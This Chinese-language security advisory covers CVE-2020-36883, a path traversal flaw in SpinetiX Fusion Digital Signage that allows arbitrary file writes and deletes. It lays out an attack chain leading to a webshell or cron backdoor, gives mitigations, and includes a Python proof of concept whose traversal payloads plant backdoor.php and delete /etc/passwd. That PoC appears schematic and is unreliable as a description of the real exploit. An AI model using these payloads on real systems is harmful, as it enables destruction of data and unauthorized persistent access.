CVE-2020-36883 CVSS 8.1 高危

CVE-2020-36883: SpinetiX Fusion数字标牌路径遍历漏洞

披露日期: 2025-12-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2020-36883

漏洞类型

路径遍历

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SpinetiX Fusion Digital Signage

漏洞概述

CVE-2020-36883是SpinetiX Fusion Digital Signage软件中的一个高危安全漏洞，CVSS评分达到8.1分。该漏洞影响3.4.8及更低版本，属于经过认证的路径遍历（Path Traversal）漏洞。攻击者通过利用index.php文件中的未验证输入参数，可以操纵文件备份和删除操作。漏洞允许攻击者利用路径遍历技术将备份文件写入服务器任意位置，同时可以通过构造特殊的备份和文件删除请求来删除系统上的任意文件。由于该漏洞需要低权限认证，攻击者可以在获取普通用户账号后实施攻击，对系统的机密性、完整性和可用性造成严重影响。

技术细节

该漏洞存在于SpinetiX Fusion Digital Signage的index.php文件中，根源在于对用户输入的文件路径参数缺乏充分的验证和过滤。攻击者在完成认证后，可以通过构造包含路径遍历序列（如../）的特殊请求参数，绕过服务器端的路径检查，实现以下攻击目的：1）文件写入操作：攻击者可以将备份文件写入服务器任意目录，例如通过构造类似../../../etc/cron.d/backdoor的路径，将恶意文件写入系统关键位置；2）文件删除操作：通过操纵备份和文件删除请求的参数，攻击者能够删除服务器上的任意文件，包括系统配置文件、应用代码文件等。由于文件操作权限较高，攻击成功后将导致系统完整性被破坏，甚至可能通过写入定时任务或启动脚本实现持久化控制。

攻击链分析

STEP 1

步骤1

攻击者获取SpinetiX Fusion Digital Signage的低权限用户账号（通过社工、弱口令爆破或其他方式）

STEP 2

步骤2

攻击者使用认证后的会话，构造包含路径遍历序列的恶意请求参数（如../../../）

STEP 3

步骤3

通过操纵index.php中的备份文件操作功能，将恶意文件写入服务器任意目录（如Web根目录）

STEP 4

步骤4

通过操纵文件删除请求参数，删除系统关键文件（如/etc/passwd、配置文件等）破坏系统完整性

STEP 5

步骤5

如果写入的是Webshell或定时任务脚本，攻击者可建立持久化后门，实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2020-36883 PoC - Authenticated Path Traversal in SpinetiX Fusion
# Target: SpinetiX Fusion Digital Signage <= 3.4.8

target = "http://target.com"
username = "admin"
password = "admin"

session = requests.Session()

# Step 1: Authentication
login_url = f"{target}/index.php"
login_data = {
    "username": username,
    "password": password
}
session.post(login_url, data=login_data)

# Step 2: Path Traversal File Write (Backup Operation)
backup_url = f"{target}/index.php"
traversal_payload = "../../../var/www/html/backdoor.php"
backup_data = {
    "action": "backup",
    "filename": traversal_payload
}
response = session.post(backup_url, data=backup_data)

# Step 3: Path Traversal File Delete
delete_url = f"{target}/index.php"
delete_payload = "../../../etc/passwd"
delete_data = {
    "action": "delete",
    "filepath": delete_payload
}
response = session.post(delete_url, data=delete_data)

print(f"Exploit sent to {target}")

影响范围

SpinetiX Fusion Digital Signage <= 3.4.8

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）限制文件操作API的访问权限，仅允许受信任的管理员账号使用；2）在Web服务器层面配置，禁止访问包含路径遍历特征的请求；3）监控和告警异常的备份/删除操作日志；4）如果业务允许，暂时禁用文件备份和删除功能；5）强化用户账号密码策略，防止账号被轻易获取。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表